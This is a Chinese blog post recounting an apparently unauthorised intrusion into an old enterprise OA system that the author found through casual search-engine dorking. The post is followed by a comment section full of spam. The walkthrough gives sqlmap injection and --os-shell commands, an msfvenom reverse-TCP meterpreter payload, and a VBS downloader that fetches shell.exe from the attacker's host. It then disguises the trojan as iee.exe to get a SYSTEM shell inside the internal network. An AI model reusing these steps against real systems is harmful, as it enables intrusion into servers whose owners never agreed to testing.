简单的漏洞,破坏性影响。
0x01 发现漏洞
七月正值暑假,闲暇时光在百度上inurl一番,找到了一个古老的企业OA系统
IP站点,没有域名,扫过一眼,.NET流行时代的普遍漏洞浮现在脑海里——SQL注入
在用户名里输入admin’,不负期望地报了错
很明显,前后端都没有对用户的输入进行过滤,直接将’带入了SQL语句进行。初步判断,此OA系统存在SQL注入漏洞。
0x02 漏洞验证
打开BurpSuite,设置好浏览器代理,抓下HTTP请求,一气呵成。
问题参数为 txtLogin=admin%27
可将整个请求复制到 test.txt,使用sqlmap -r 来注入
sqlmap -u http://x.x.x.x/xx.aspx --forms
至此,可以确认存在 error-based、stack quires和time-based三个类型的漏洞
0x03 判断数据库用户的权限
发现SQL注入后,首先要判断权限,高权限的注入可以为后续渗透省下很大功夫
sqlmap -u http://x.x.x.x/xx.aspx --forms --is-dba
非常nice,再次不负期望地返回了DBA权限
输入以下命令,获得一个shell
sqlmap -u http://x.x.x.x/xx.aspx --forms --os-shell
NT/SYSTEM权限,时隔两个多月,复现有误,不予贴图
0x04 反弹shell 深入内网
生成一个shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx > /var/www/html/shell.exe
由于环境艰难,不能直接上传文件,我选择了用vbs脚本来下载木马到服务器
代码如下:
Set post=CreateObject("Msxml2.XMLHTTP")
post.Open "GET","http://x.x.x.x/shell.exe"
'发送请求
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
'等待3秒,等文件下载
wscript.sleep 3000
aGet.Write(post.responseBody)'写数据
aGet.SaveToFile "shell.exe",2用echo命令缓慢地写完了vbs脚本之后,顺利运行,下载了木马
更改名字,移动到IE安装目录进行伪装
start iee.exe 运行木马
metasploit成功收到了SYSTEM权限的shell
该主机拥有内网IP,存在内网,可以互通,并且该主机作为中央数据库
此内网主机皆为VMware虚拟机
0x05 结束测试,提交漏洞
本次渗透测试成功拿到最高权限, 到此为止,不再深入。
随着攻击与防御技术的彼此攀升,程序员的安全意识逐渐提高,SQL也越来越少。
但不少粗糙的程序和古老的系统仍然存在此漏洞,此类漏洞解决方法简单,只用对用户输入参数稍加处理即可。
很好!
好好学习,明年叫你用Linux建博客
牛逼,说的很有用处
哈哈哈,这场捧的
wow 勉为其难的踩一个叭
我打你哦
这个码打得好啊
哈哈,还好吧
Appreciate you sharing, great blog article. Fantastic.
Very good blog post.Really thank you! Will read on…
Fantastic article post.Thanks Again.
Great blog post.Really looking forward to read more. Really Great.
Very neat article.Thanks Again. Really Cool.
Very informative blog post.Really looking forward to read more. Really Great.
Thank you ever so for you post. Awesome.
Very neat blog post.Really thank you! Great.
Great blog article.Really looking forward to read more. Keep writing.
Great blog.Much thanks again.
I have been reading out a few of your articles and i must say pretty nice stuff. I will make sure to bookmark your blog.
Great blog article.Much thanks again.
You write Formidable articles, keep up good work.
Awesome blog post.Much thanks again. Keep writing.
Enjoyed every bit of your article post.Really looking forward to read more. Keep writing.
Appreciate you sharing, great blog.Really thank you! Much obliged.
Very informative article post.Really looking forward to read more. Will read on…
Awesome blog post.Thanks Again. Awesome.
wow, awesome article. Want more.
Very good blog.Really thank you! Cool.
I really like and appreciate your post.Thanks Again. Awesome.
I really like and appreciate your post.Really looking forward to read more.
Fantastic blog.Thanks Again. Much obliged.
I love your blog. It looks every informative.
Thanks for ones marvelous posting! I truly enjoyed reading it, you will be a great author.
I will make certain to bookmark your blog and may come back later in life.
I want to encourage you to continue your great work,
have a nice evening!
I really like and appreciate your article post.Really looking forward to read more. Really Cool.
Makes sense to me.
Thank you for your blog. Keep writing.
Great post.Really looking forward to read more. Will read on…
Thank you for your article post.Thanks Again. Great.
Awesome blog post. Fantastic.
Thank you for your blog.Thanks Again. Awesome.
Very good article post. Want more.
I used to be able to find good information from your blog posts.
Awesome blog post.Really thank you! Fantastic.
Very informative blog post.Really thank you! Really Great.
ivermectin for sale humans ivermectin human
I imagine so. Very good stuff, I agree totally.
How do I subscribe to your blog? Thanks for your help.
What a great article.. i subscribed btw!
free bitcoins verdienenBitcoin for live cd11e72
Absolutely written written content , regards for information .
Very good info. Lucky me I found your site by chance (stumbleupon). I have bookmarked it for later.
I couldn’t refrain from commenting. Exceptionally well written!